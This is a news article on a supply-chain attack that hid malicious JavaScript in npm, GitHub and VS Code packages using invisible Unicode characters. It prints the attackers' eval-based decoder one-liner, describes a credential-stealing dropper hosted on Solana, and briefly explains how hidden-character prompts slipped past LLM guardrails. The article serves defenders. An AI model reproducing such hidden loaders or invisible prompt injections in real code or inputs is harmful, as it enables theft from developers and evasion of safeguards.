Invisible Unicode Characters Used to Hide Malicious Payloads

by Priyanka Patel

Developers and security researchers are sounding the alarm over a sophisticated supply-chain attack using invisible code that allows malicious payloads to hide in plain sight. By exploiting a quirk in the Unicode standard, attackers have managed to embed executable instructions within software repositories that appear as empty lines or whitespace to human reviewers and many automated security tools.

The campaign has targeted major hubs of the open-source ecosystem, including GitHub, the npm registry, and the VS Code marketplace. Security researchers at Aikido identified at least 151 malicious packages using this technique, though they warn this figure likely represents only a small fraction of the total campaign, as many packages were deleted shortly after being uploaded.

For those of us who have spent years in the trenches of software engineering, the most unsettling part of this breach is its simplicity. It doesn’t rely on a complex zero-day exploit in a kernel. instead, it leverages the very way computers interpret text, creating a gap between what a human sees on a screen and what a JavaScript interpreter executes in the background.

How Invisible Unicode Characters Bypass Human Review

The core of the attack relies on Private Use Areas (PUA). In the Unicode specification, these are specific ranges of code points reserved for private use—essentially placeholders that allow organizations to define their own special characters, symbols, or emojis that aren’t part of the universal standard.

Due to the fact that these characters have no standardized visual representation, most text editors and IDEs render them as nothing at all. When a developer performs a code review or uses a static analysis tool to scan for vulnerabilities, these blocks of code appear as blank lines. However, to a JavaScript interpreter, these code points are distinct, readable values that can be manipulated, and executed.

Comparison of Code Perception: Human vs. Machine
Perspective Visual/Logical Interpretation Result
Human Developer Whitespace or empty backticks (“) Code appears clean/empty
Static Analysis Tool Non-printable characters/Blank lines No malicious patterns detected
JS Interpreter Specific Unicode code points Executable malicious payload

From AI Prompt Injection to Malware Payloads

This technique is not entirely recent, but its application has evolved rapidly. Earlier in 2024, hackers began using invisible Unicode characters to conceal malicious prompts fed to Large Language Models (LLMs). Because AI engines process tokens rather than visual pixels, they could read and follow the hidden instructions, effectively bypassing the safety guardrails designed to prevent harmful outputs.

The transition from AI manipulation to traditional malware is a significant escalation. Attackers are now applying the same logic to software dependencies. In the current campaign, the malicious code is not executed directly as a script but is instead hidden within a string. A small, seemingly innocent decoder function then extracts the real bytes from these invisible characters and passes them to the eval() function, which executes the resulting code during runtime.

The following code snippet illustrates the decoder used in these attacks:

const s = v => [...v].map(w => ( w = w.codePointAt(0), w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 : w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null )).filter(n => n !== null); eval(Buffer.from(s(``)).toString('utf-8'));

As Aikido explained, the backtick string passed to the function s() looks empty in every viewer, but It’s actually packed with invisible characters that, once decoded, produce a full malicious payload.

The Mechanics of the Breach: From GitHub to Solana

The goal of these invisible payloads is typically credential and asset theft. In several analyzed incidents, the decoded payload acted as a “dropper,” fetching and executing a second-stage script. Interestingly, attackers have used the Solana blockchain as a delivery channel for these second-stage scripts, leveraging the decentralized nature of the network to host malicious code that is hard for centralized authorities to take down.

Once active, the malware is capable of stealing sensitive data, including:

  • Cryptocurrency tokens and private keys.
  • Environment variables containing API keys and secrets.
  • User credentials stored within the local system.

The use of the VS Code marketplace is particularly concerning, as it places the malicious code directly into the developer’s primary workspace, potentially granting the attacker access to every project the developer is working on.

Hardening the Software Supply Chain

This attack highlights a critical weakness in the current software development lifecycle: the over-reliance on visual inspection and basic static analysis. To defend against this supply-chain attack using invisible code, developers must adopt a more rigorous approach to dependency management.

Security experts recommend several immediate steps to mitigate risk:

  • Strict Dependency Auditing: Carefully inspect new packages and their dependencies before integration. This includes checking for “typosquatting,” where a malicious package has a name very similar to a popular legitimate one.
  • Enhanced Tooling: Use security tools that can detect non-printable Unicode characters or alert users when eval() is used on dynamically generated strings.
  • Least Privilege Access: Ensure that development environments and CI/CD pipelines run with the minimum necessary permissions to limit the impact of a successful breach.

As AI continues to be used to generate more convincing—and potentially malicious—code, the risk of “legitimate-looking” packages will only grow. The ability to hide payloads in the gaps of the Unicode standard is a reminder that in cybersecurity, what you don’t see is often the greatest threat.

The security community is currently monitoring for new variants of these PUA-based attacks. Further updates are expected as repository maintainers at GitHub and npm implement more robust scanning for invisible Unicode characters across their platforms.

Do you use automated tools to scan your dependencies for hidden characters? Share your experience or questions in the comments below.

You may also like

Leave a Comment